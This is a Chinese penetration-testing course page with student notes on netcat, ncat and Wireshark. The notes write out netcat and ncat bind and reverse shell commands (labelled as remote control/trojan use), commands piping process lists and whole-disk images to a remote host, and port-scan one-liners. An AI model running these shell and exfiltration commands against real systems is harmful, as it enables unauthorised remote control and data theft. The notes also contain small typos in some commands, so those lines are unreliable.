默认计划
931人加入学习
(22人评价)
安全测试基本工具

购买过Kali Linux渗透测试、武官课程包、安全技术会员课程的学员不要再买此课程

价格 ¥ 299.00
该课程属于 高校公益行 | 网络安全实践训练营 请加入后再学习

64位 首先作为被空端

man 是手册 通过man+命令 查看命令使用方法

wirshark  可以进行网络抓包嗅探 也可以将流量包保存下来 进行场景分析

wireshark 主要是分析 衡量一个抓包软件好坏 就是看解码能力

[展开全文]

ncat 弥补了nc连接后肉鸡对入侵者缺乏认证,谁都可以通过端口进行控制它的缺点

ncat -c bash --allow 1.1.1.1 -vnl 333 --ssl      被控制端, --allow:只允许特定的ip访问它,ssl:加密

ncat -nv 10.1.1.1 333 -ssl

控制端

 

[展开全文]

nc缺乏加密和身份验证的能力

ncat包含于nmap工具包中

不同系统/平台的nc参数功能不尽相同,弥补nc的不足

Wireshark 抓包分析

网卡上的数据包 Interface List

使用混杂模式+抓包筛选器 

pcap 兼容性最好

筛选器:抓包、显示

 

[展开全文]

NETCAT缺陷

NC缺乏加密和身份验证能力

明文传输

服务器端易被嗅探,还原出数据交换内容,易被别人窃取内容

Ncat:

Ncat 包含于nmap工具包中,可以弥补nc加密及身份验证不足

A:ncat -c bash -allow ip地址 -vnl  333 --ssl

B: ncat -nv ip地址 333 --ssl

ssl: 加密管道

-allow IP地址 只允许目标IP控制

不同系统平台的nc参数不同

man 查询命令

nc -h或nc --help

WIRESHARK

抓包嗅探协议分析

安全专家必备的技能

抓包引擎

libpcap9 ——linux

winpcap10 ——windows

wireshark 对抓到的包进行解码

wireshark 筛选器

1.抓包筛选器

2.显示筛选器

[展开全文]

.nc

 

 1. nc -h

基本格式:nc [-options] hostname port [ports] ... 

nc -l -p port [options] [hostname] [port]

-d 后台模式 
-e prog
程序重定向,一旦连接,就执行 [危险!!] 
-g gateway source-routing hop point, up to 8 
-G num source-routing pointer: 4, 8, 12, ... 
-h
帮助信息 
-i secs
延时的间隔 
-l
监听模式,用于入站连接 
-L
连接关闭后,仍然继续监听 
-n
指定数字的IP地址,不能用hostname 
-o file
记录16进制的传输 
-p port
本地端口号 
-r
随机本地及远程端口 
-s addr
本地源地址 
-t
使用TELNET交互方式 
-u UDP
模式 
-v
详细输出--用两个-v可得到更详细的内容 
-w secs timeout
的时间 
-z
将输入输出关掉--用于扫描时

端口的表示方法可写为M-N的范围格式。

 

 2.nc的基本用法

 格式:nc -nvv 192.168.x.x 80 
讲解:连到192.168.x.xTCP80端口

 

2)监听LOCAL主机,例子: 
格式:nc -l -p 80 
讲解:监听本机的TCP80端口

 

3)扫描远程主机,例子: 
格式:nc -nvv -w2 -z 192.168.x.x 80-445 
讲解:扫描192.168.x.xTCP80TCP445的所有端口

 

 传输文本信息 

Anc -l -p 4444

• Bnc –nv 1.1.1.1 4444

 

传输/目录 

传输

• Anc -lp 333 > 1.mp4

• Bnc -nv 1.1.1.1 333 < 1.mp4 –q 1 • • Anc -q 1 -lp 333 < a.mp4 • B nc -nv 1.1.1.1 333 > 2.mp4

传输目录

• Atar -cvf - music/ | nc -lp 333 –q 1 • Bnc -nv 1.1.1.1 333 | tar -xvf –

 

加密传输

加密传

• Anc -lp 333 | mcrypt --flush -Fbqd -a rijndael-256 -m ecb > 1.mp4

• B mcrypt --flush -Fbq -a rijndael-256 -m ecb < a.mp4 | nc -nv 1.1.1.1 333 -q 1

 

远程控制/ 

加密所有流量 

流媒体服务器

 A cat 1.mp4 | nc -lp 333

 B 1.1.1.1 333 | mplayer -vo x11 -cache 3000

远程克隆硬盘

 A nc -lp 333 | dd of=/dev/sda

 B dd if=/dev/sda | nc -nv 1.1.1.1 333 –q 1

 

远程控制:

 正向:

• Anc -lp 333 -c bash

• Bnc 1.1.1.1 333

 

反向:

• Anc -lp 333

• Bnc 1.1.1.1 333 -c bash • 注:Windows用户把bash改成cmd

 

nccat:管道加密

 

 Ancat ncat -c bash --allow 192.168.20.14 -vnl 333 --ssl 

Bncat -nv 1.1.1.1 333 --ssl

[展开全文]

NC

侦听模式/传输模式

telnet / 获取banner信息

nc -nv 1.1.1.1 110    (pop3)

nc -nv 1.1.1.1 25      (smtp)

nc -nv 1.1.1.1 80

-v:显示相关的详细链接信息

-n:加ip地址时不进行dns解析

传输文本信息

A:nc -l -p 4444

B:nc -nv 1.1.1.1 4444

-l:listen,打开监听一个端口

-p:指定开放端口号

-q:nc完就断开连接

A: nc -l -p 333 > ps.txt

B: ps aux | nc -nv AIP -q 1

传输文件/目录

传输文件:

A: nc -l -p 333 > 1.map4

B: nc -nv AIP 333 < 1.mp4 -q 1

A: nc -l -p 333 < a.mp4 -q 1

B: nc -nv AIP 333 > b.mp4

>: 表示接收方

<: 表示发送方

传输目录:

A: tar -cvf - music/ | nc -lp 333 -q 1

B: nc -nv AIP 333 | tar -xvf -

先把目录打包,在放到nc的管道中

加密传输文件

A: nc -lp 333 | mcrypt --flush -Fbqd -a  rijndael-256 -m ecb > 1.mp4

B: mcrypt --flush -Fbq -a rijndael-356 -m ecb < a.mp4 | nc -nv AIP 333 -q 1

远程控制/木马

正向:

A: nc -lp 333 -c bash

B: nc 1.1.1.1 333

反向:

A: nc -lp 333

B: nc 1.1.1.1 333 -c bash

注:Windows用户把bash改成cmd

加密所有流量

 

流媒体服务器

server: cat 1.mp4 | nc -lp 333

client: nc -nv serverIP 333 | mplayer -vo x11 -cache 3000 -

远程克隆硬盘

A: nc -lp 333 | dd of=/dev/sda

B: dd if=/dev/sda | nc -nv 1.1.1.1 333 -q 1

端口扫描

nc -nvz 1.1.1.1 1-65535

nc-vnzu 1.1.1.1 1-1024

-z: 扫描模式

-u; 探测所有udp端口

 

ncat

A: ncat -c bash --allow bIP -vnl 333 --ssl

B: ncat -nv aIP 333 --ssl

 

[展开全文]

授课教师

安全经理

课程特色

视频(13)
下载资料(1)